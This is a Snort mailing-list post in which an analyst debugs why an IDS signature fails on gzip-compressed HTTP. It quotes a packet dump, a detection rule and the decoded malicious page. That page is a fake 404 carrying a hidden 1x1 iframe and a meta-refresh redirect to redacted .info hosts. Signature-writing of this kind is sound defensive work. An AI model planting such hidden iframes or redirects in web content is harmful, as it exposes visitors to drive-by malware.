Snort mailing list archives
http_inspect - no gzip decompressed data processed?
From: Eoin Miller <eoin.miller () trojanedbinaries com>
Date: Thu, 15 Jul 2010 20:26:46 +0000
Have a small pcap I am trying to write sigs for, after figuring out I didn't have gzip enabled because I used the snort.conf that came with snort rather than the snort.conf that came with the VRT ruleset (doh!), I am still unable to get any of the sigs to fire on it.
Signature (dumbed down just for testing purposes here). If I make the signature only require matches on anything that is not GZIP'd, then it will fire): alert tcp any any -> any any (msg:"MALVERTISING hidden iframe served by ngix 2"; content:"iframe"; nocase; classtype:bad-unknown; sid:5600066; rev:1;)
Raw packet that should be causing the sig to fire (removed address/ports stuff). This is the only packet in the stream that has gzip encoded data:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 07/12-18:07:10.511891 XXX.XXX.XXX.XXX:80 -> XXX.XXX.XXX.XXX:2790 TCP TTL:51 TOS:0x0 ID:2145 IpLen:20 DgmLen:575 DF ***AP*** Seq: 0x126BD99B Ack: 0x61DCA8DD Win: 0x1A28 TcpLen: 20 0x0000: 0x0010: 0x0020: 0x0030: 54 54 50 2F 31 2E 31 20 32 HTTP/1.1 2 0x0040: 30 30 20 4F 4B 0D 0A 53 65 72 76 65 72 3A 20 6E 00 OK..Server: n 0x0050: 67 69 6E 78 2F 30 2E 36 2E 33 39 0D 0A 44 61 74 ginx/0.6.39..Dat 0x0060: 65 3A 20 4D 6F 6E 2C 20 31 32 20 4A 75 6C 20 32 e: Mon, 12 Jul 2 0x0070: 30 31 30 20 31 38 3A 30 37 3A 31 30 20 47 4D 54 010 18:07:10 GMT 0x0080: 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 ..Content-Type: 0x0090: 74 65 78 74 2F 68 74 6D 6C 0D 0A 54 72 61 6E 73 text/html..Trans 0x00A0: 66 65 72 2D 45 6E 63 6F 64 69 6E 67 3A 20 63 68 fer-Encoding: ch 0x00B0: 75 6E 6B 65 64 0D 0A 43 6F 6E 6E 65 63 74 69 6F unked..Connectio 0x00C0: 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 58 n: keep-alive..X 0x00D0: 2D 50 6F 77 65 72 65 64 2D 42 79 3A 20 50 48 50 -Powered-By: PHP 0x00E0: 2F 35 2E 31 2E 36 0D 0A 43 6F 6E 74 65 6E 74 2D /5.1.6..Content- 0x00F0: 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 0D 0A Encoding: gzip.. 0x0100: 0D 0A 61 0D 0A 1F 8B 08 00 00 00 00 00 00 03 0D ..a............. 0x0110: 0A 31 33 30 0D 0A BD 52 CB 4E C4 30 0C BC EF 57 .130...R.N.0...W 0x0120: 44 B9 04 24 DA 74 D9 07 85 4D 7A 44 82 03 1C E0 D..$.t...MzD.... 0x0130: 07 D2 D6 6D 22 D2 64 37 75 F7 F1 F7 A4 DD 15 42 ...m".d7u......B 0x0140: 20 AE F8 64 8F 3D 1E 6B 64 A1 B1 B3 85 D0 A0 EA ..d.=.kd....... 0x0150: 62 26 3A 40 45 34 E2 36 81 DD 60 F6 92 56 DE 21 b&:@E4.6..`..V.! 0x0160: 38 4C F0 B4 05 4A 2E 95 A4 08 47 E4 23 73 43 2A 8L...J....G.#sC* 0x0170: AD 42 0F 28 9F DE 5E 93 3C 5F DD 27 73 1A 17 A1 .B.(..^.<_.'s... 0x0180: 41 0B C5 32 5B 92 17 8F E4 D1 0F AE 16 FC 0C 0A A..2[........... 0x0190: 3E 89 89 D2 D7 27 52 B6 95 B7 3E 48 7A D0 06 61 >....'R...>Hz..a 0x01A0: 64 56 51 0E 42 BC 68 FE 93 1E 11 C1 2F ED 99 D0 dVQ.B.h...../... 0x01B0: 71 E6 52 B8 D6 B8 23 CF D2 75 BA 58 7D 9B E0 A3 q.R...#..u.X}... 0x01C0: 42 31 FB FF F8 65 23 0B D0 04 E8 35 FB 72 90 DD B1...e#....5.r.. 0x01D0: 6D 86 60 E5 68 F5 03 E7 25 58 6B 2A DF C3 47 9E m.`.h...%Xk*..G. 0x01E0: 1A D7 78 BE CB 7B CE 0A D1 57 C1 6C 91 58 E5 DA ..x..{...W.l.X.. 0x01F0: 41 B5 20 E9 B3 DA AB B7 09 A4 05 E9 C1 36 69 E7 A. ..........6i. 0x0200: F7 F0 EE AF 16 D9 72 7D B3 C8 56 EB EB 0D 11 FC ......r}..V..... 0x0210: CC 8B 66 9A 26 A8 0E 48 1F 2A C9 FE D2 72 B7 96 ..f.&..H.*...r.. 0x0220: 33 72 30 35 6A C9 E6 8C 68 30 AD C6 29 9D D8 A5 3r05j...h0..)... 0x0230: 0F 35 04 C9 B2 78 10 3F 2F 8C C9 F4 36 9F 04 6B .5...x.?/...6..k 0x0240: BF 18 3D 02 00 00 0D 0A 30 0D 0A 0D 0A ..=.....0.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Decoded HTML response output: HTTP/1.1 200 OK Connection: keep-alive Content-Length: 573 Content-Type: text/html Date: Mon, 12 Jul 2010 18:07:10 GMT Server: nginx/0.6.39 X-Powered-By: PHP/5.1.6<html><head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"> <title>404 Not Found</title></head><body bgcolor="white"> <center><h1>404 Not Found</h1></center> <hr><center>nginx/0.6.35</center> </body> <meta http-equiv='refresh' content='7;url=http://<REMOVED>.info/q8s/'><script l anguage="JavaScript"> self.moveTo(3046,3056); </script> <iframe src='http://<REMOVED>.info/n2l/' width='1' height='1' frameborder='0'>< /iframe></html>
The output from http_inspect seems weird as it claims 0 bytes for "Gzip Decompressed Data Processed"?
=============================================================================== HTTP Inspect - encodings (Note: stream-reassembled packets included): POST methods: 0 GET methods: 2 HTTP Request Headers extracted: 2 HTTP Request Cookies extracted: 0 Post parameters extracted: 0 HTTP response Headers extracted: 2 HTTP Response Cookies extracted: 0 Unicode: 0 Double unicode: 0 Non-ASCII representable: 0 Base 36: 0 Directory traversals: 0 Extra slashes ("//"): 0 Self-referencing paths ("./"): 0 HTTP Response Gzip packets extracted: 2 Gzip Compressed Data Processed: 331.00 Gzip Decompressed Data Processed: 0.00 Total packets processed: 4 =============================================================================== http_inspect config from snort.conf: ===============================================================================preprocessor http_inspect: global iis_unicode_map unicode.map 1252 compress_depth 20480 decompress_depth 20480
preprocessor http_inspect_server: server default \ chunk_length 500000 \ server_flow_depth 0 \ client_flow_depth 0 \ post_depth 65495 \ oversize_dir_length 500 \ max_header_length 750 \ max_headers 100 \ports { 80 1220 2301 3128 7777 7779 8000 8008 8028 8080 8180 8888 9999 } \
non_rfc_char { 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 } \ enable_cookie \ extended_response_inspection \ inspect_gzip \ apache_whitespace no \ ascii no \ bare_byte no \ directory no \ double_decode no \ iis_backslash no \ iis_delimiter no \ iis_unicode no \ multi_slash no \ non_strict \ u_encode yes \ webroot no =============================================================================== Version info: =============================================================================== # snort --version ,,_ -*> Snort! <*- o" )~ Version 2.8.6 IPv6 GRE (Build 38)'''' By Martin Roesch & The Snort Team: http://www.snort.org/snort/snort-team
Copyright (C) 1998-2010 Sourcefire, Inc., et al. Using PCRE version: 7.4 2007-09-21 Using ZLIB version: 1.2.3.3 ===============================================================================I am seriously tearing my hair out, anyone have any ideas/suggestions? Been reading and re-reading the README.http_inspect, but I am not seeing why this would not be working with the default configuration.
-- Eoin
------------------------------------------------------------------------------ This SF.net email is sponsored by Sprint What will you do first with EVO, the first 4G phone? Visit sprint.com/first -- http://p.sf.net/sfu/sprint-com-first
_______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- http_inspect - no gzip decompressed data processed? Eoin Miller (Jul 15)